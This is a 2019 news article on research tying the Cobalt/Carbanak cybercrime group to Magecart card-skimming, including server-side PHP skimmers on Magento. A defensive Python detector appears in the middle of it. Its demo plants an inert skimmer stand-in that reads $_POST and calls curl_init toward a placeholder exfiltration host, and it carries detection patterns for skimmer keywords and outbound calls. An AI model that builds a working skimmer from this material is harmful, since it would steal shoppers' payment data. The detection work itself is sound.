Cobalt cybercrime group might be launching Magecart skimming attacks

Researchers link Magecart-based skimming attacks to Cobalt (a.k.a. Carbanak), whose cyber attacks have netted millions of dollars.

Researchers have found links between Magecart-based Web skimming attacks and a sophisticated cybercrime group dubbed Cobalt that has stolen hundreds of millions from financial institutions worldwide. They also found evidence of server-side skimming, which is harder to detect than the typical JavaScript injections.

A joint analysis by Malwarebytes and security firm HYAS found significant similarities between the registration information for domain names used in their infrastructure by both Cobalt and a group tracked until now as Magecart Group 4 (MG4). In particular, both Cobalt and MG4 used the same email account naming pattern, the same email services, the same domain registrars and the same privacy protection services.

“Given the use of privacy services for all the domains in question, it is highly unlikely that this naming convention would be known to any other actor than the actors who registered both the Cobalt Group and Magecart infrastructure,” the researchers said in a report released today. “In addition, further investigation revealed that regardless of the email provider used, ten of the seemingly separate accounts reused only two different IP addresses, even over weeks and months between registrations.”

HYAS, which provides attribution intelligence services, searched its datasets and found a particular email address that registered Magecart domains but was also used in a spear-phishing email campaign with malicious Word documents that fits Cobalt’s modus operandi. The same address was also used to register domain names that are very similar to those used by Cobalt in the past.

Who is Cobalt?

The Cobalt group, also identified as Carbanak in some reports, is a cybercrime gang that specializes in stealing large amounts of money from banks and other financial organizations. The group typically breaks into the networks of its targets via spear-phishing emails with malicious attachments that exploit vulnerabilities in Microsoft Word.

After gaining a foothold, the group can spend months inside the compromised networks, performing lateral movement and studying their victims’ internal procedures and workflows, as well as their custom internal applications. This is all in preparation for a final heist that allows them to steal millions of dollars in one go, sometimes by hacking into the victim’s ATM network and sending money mules to collect the cash.

Magecart, on the other hand, is an umbrella moniker for around a dozen separate groups that break into e-commerce websites and inject malicious JavaScript files into their checkout pages in order to steal payment card details and other personal information entered by users. The Magecart groups are known for using a variety of techniques to inject their code into websites, including compromising third-party services that already have legitimate scripts loaded into the targeted websites for analytics, advertising and other purposes.

FIN6 cybercrime group also using card skimming

Recently, researchers from IBM found evidence that another cybercrime group called FIN6, which is related to Cobalt, has branched out into Web-based card skimming. FIN6 is known for compromising the physical point-of-sale systems of organizations from the retail, hospitality and restaurant sectors in order to steal payment card data. The recently observed Web skimming activity associated with FIN6 actually matches that of another group called Magecart Group 6.

“Based on their historical ties to the space, and the entrance of sophisticated actor groups such as FIN6 and others, it would be logical that Cobalt Group would also enter this field and continue to diversify their criminal efforts against global financial institutions,” the Malwarebytes and HYAS researchers said in their report.

Server-side skimming

While Magecart attacks are primarily client-side -- malicious JavaScript gets loaded and is executed inside users’ browsers -- Malwarebytes also found evidence of Magecart Group 4 performing server-side skimming. This technique involves the use of a PHP script that intercepts and exfiltrates data directly at the Web application level when it’s being processed.

Server-side skimming is much harder to detect, especially from the outside, because it’s not visible to browsers or website scanners. In order to detect such compromises, website owners must use a solution capable of scanning the files on the server itself or to monitor their integrity to identify rogue changes.

The reason why Malwarebytes spotted the MG4 server-side skimmer on a server was because the attackers made a mistake and served it as JavaScript instead. This allowed its contents to be indexed by a service called The file turned out to be an almost exact copy of a server-side PHP skimmer that researchers from Web security firm Sucuri reported in August.

The script is made to work with Magento, an e-commerce platform, and is automatically loaded by the application. It then monitors the application requests for certain keywords such as billing, cvv, year, cc_number, dummy, cc_, payment, card_number, username, expiry, firstname, login, shipping, month, securetrading, cvc2. If such keywords are detected, the request along with the cookie information is sent to an external server controlled by the attackers.
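Because a server-side skimmer never reaches the browser, the two controls the article calls for both run on the server: an integrity baseline that surfaces rogue file changes, and a triage of the changed files. The following Python is an added example, not code from the Malwarebytes, HYAS or Sucuri research; the directory tree, file names and file contents are constructed for the demo, while the keyword list is the one the article reports, and the request-access and outbound-call patterns are the author's own heuristic.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Keywords the article lists as those the MG4 server-side skimmer watched for.
SKIMMER_KEYWORDS = ("billing", "cvv", "year", "cc_number", "dummy", "cc_", "payment",
                    "card_number", "username", "expiry", "firstname", "login",
                    "shipping", "month", "securetrading", "cvc2")
REQUEST_ACCESS = re.compile(r"\$_(POST|REQUEST|COOKIE)\b")   # reads submitted data
EXFIL_CALLS = re.compile(r"\b(curl_init|curl_exec|file_get_contents|fsockopen)\s*\(")

def build_baseline(root: Path) -> dict:
    """SHA-256 digest of every PHP file under root, keyed by relative POSIX path."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*.php")}

def diff_baseline(baseline: dict, current: dict) -> dict:
    """Rogue changes since the baseline was taken: new, deleted and modified files."""
    common = baseline.keys() & current.keys()
    return {"added": sorted(current.keys() - baseline.keys()),
            "removed": sorted(baseline.keys() - current.keys()),
            "modified": sorted(f for f in common if baseline[f] != current[f])}

def skimmer_indicators(source: str) -> list:
    """Triage a PHP file. Single keywords ('year', 'login') are everywhere in legitimate
    code, so report only when many keywords, request access and an outbound call co-occur."""
    hits = [k for k in SKIMMER_KEYWORDS if k in source]
    reasons = []
    if len(hits) >= 6:
        reasons.append("%d payment-form keywords" % len(hits))
    if REQUEST_ACCESS.search(source):
        reasons.append("reads request/cookie data")
    if EXFIL_CALLS.search(source):
        reasons.append("outbound transfer call")
    return reasons if len(reasons) == 3 else []

def run_demo() -> dict:
    """Constructed Magento-like tree: take a baseline, drop a file, then diff and triage."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "app").mkdir()
        (root / "app" / "Checkout.php").write_text("<?php // legitimate: shipping, billing, month, year\n")
        baseline = build_baseline(root)
        (root / "app" / "Cache.php").write_text(        # constructed, inert stand-in
            "<?php $d = $_POST; // cc_number cvv expiry card_number firstname username payment securetrading\n"
            "curl_init('http://exfil.invalid');\n")
        changes = diff_baseline(baseline, build_baseline(root))
        flagged = {f: skimmer_indicators((root / f).read_text())
                   for f in changes["added"] + changes["modified"]}
        return {"changes": changes, "flagged": {f: r for f, r in flagged.items() if r}}
```

In production the baseline would be stored off-host and compared on a schedule; the triage step only narrows which changed files a responder reads first.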

“The use of both client-side and server-side skimmers and the challenges this poses in identifying Magecart compromises by advanced threat groups necessitates the ongoing work of industry partners to help defend against this significant and growing threat,” the researchers said.

Copyright © 2019 IDG Communications, Inc.